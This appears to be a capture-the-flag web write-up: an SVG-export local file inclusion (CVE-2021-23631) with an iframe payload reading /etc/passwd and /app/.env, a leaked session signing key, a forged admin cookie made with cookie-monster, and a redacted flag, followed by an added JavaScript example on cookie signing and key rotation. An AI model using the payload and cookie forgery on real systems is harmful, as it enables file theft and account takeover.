Got a way to display a file via the SVG-to-PNG LFI, CVE-2021-23631:

POST /api/export HTTP/1.1
Host: 138.68.175.87:30484
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://138.68.175.87:30484/dashboard
Content-Type: application/json
Origin: http://138.68.175.87:30484
Content-Length: 283
DNT: 1
Connection: close
Cookie: session.sig=4u6WkhlFO5u5hCXaxOP-HGYLD9s; session=eyJ1c2VybmFtZSI6InRlc3QyIn0=

{"svg":"`<svg-dummy></svg-dummy><iframe src=\"file:///etc/passwd\" width=\"100%\" height=\"1000px\"></iframe><svg viewBox=\"0 0 240 80\" height=\"1000\" width=\"1000\" xmlns=\"http://www.w3.org/2000/svg\"><text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text></svg>`"}

Got the secret to sign/verify cookie in /app/.env

SESSION_SECRET_KEY=5921719c3037662e94250307ec5ed1db

Used cookie-monster to generate the cookie:

root@sd-127123:/tmp# cat test.json
{"username":"admin"}
root@sd-127123:/tmp# cookie-monster -e -f test.json -k 5921719c3037662e94250307ec5ed1db
               _  _
             _/0\/ \_
    .-.   .-` \_/\0/ '-.
   /:::\ / ,_________,  \
  /\:::/ \  '. (:::/  `'-;
  \ `-'`\ '._ `"'"'\__    \
   `'-.  \   `)-=-=(  `,   |
       \  `-"`      `"-`   /

[+] Data Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=
[+] Signature Cookie: session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o

Burp Repeater:

GET /dashboard HTTP/1.1
Host: 138.68.150.120:31876
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://138.68.150.120:31876/
DNT: 1
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=; session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Upgrade-Insecure-Requests: 1

The flag is in the source code response:

var flag = 'HTB{ZZZZZZZZZZZZZZZZZZZZZZ}'
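
Added example, not part of the original write-up or the challenge code: a server-side view of why the leaked key was enough, and what rotation has to look like afterwards. It assumes the Keygrip-style scheme that the `session` / `session.sig` pair suggests (HMAC-SHA1 over `name=value`, URL-safe base64 without padding); the key strings and the `sign`, `verify` and `demo` helpers are constructed for illustration.

```javascript
// Added example. Assumption: Keygrip-style signing, i.e.
// sig = urlsafe-base64(HMAC-SHA1(key, "name=value")) with padding stripped.
const crypto = require('node:crypto');

function sign(name, value, key) {
  return crypto.createHmac('sha1', key)
    .update(`${name}=${value}`)
    .digest('base64')
    .replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}

// Returns the index of the key that verifies the cookie, or -1 if none does.
// keys[0] is the current signing key; later entries are older keys still accepted.
function verify(name, value, sig, keys) {
  const given = Buffer.from(String(sig));
  for (let i = 0; i < keys.length; i++) {
    const expected = Buffer.from(sign(name, value, keys[i]));
    // Length check first: timingSafeEqual throws on unequal lengths.
    if (expected.length === given.length &&
        crypto.timingSafeEqual(expected, given)) return i;
  }
  return -1;
}

// Constructed keys, standing in for the value read from /app/.env and its replacement.
const LEAKED_KEY = 'constructed-leaked-key-0000';
const NEW_KEY = 'constructed-new-key-1111';

function demo() {
  // The cookie body is only base64(JSON); nothing in it is secret or server-side.
  const value = Buffer.from(JSON.stringify({ username: 'admin' })).toString('base64');
  // Anyone holding the key can compute a signature the server will accept.
  const sigFromLeakedKey = sign('session', value, LEAKED_KEY);
  return {
    value,
    beforeRotation: verify('session', value, sigFromLeakedKey, [LEAKED_KEY]),
    // Keeping the leaked key as a fallback verifier leaves the cookie valid.
    keptAsFallback: verify('session', value, sigFromLeakedKey, [NEW_KEY, LEAKED_KEY]),
    // Only dropping the leaked key entirely invalidates it.
    afterRotation: verify('session', value, sigFromLeakedKey, [NEW_KEY]),
    // A changed body no longer matches the signature.
    tampered: verify('session', value.replace(/^e/, 'f'), sigFromLeakedKey, [LEAKED_KEY]),
  };
}

console.log(demo());
```

After a leak like this one the old key has to be removed from the verifier list outright, which logs out every existing session; identity kept in a server-side session store would not be forgeable from the signing key alone.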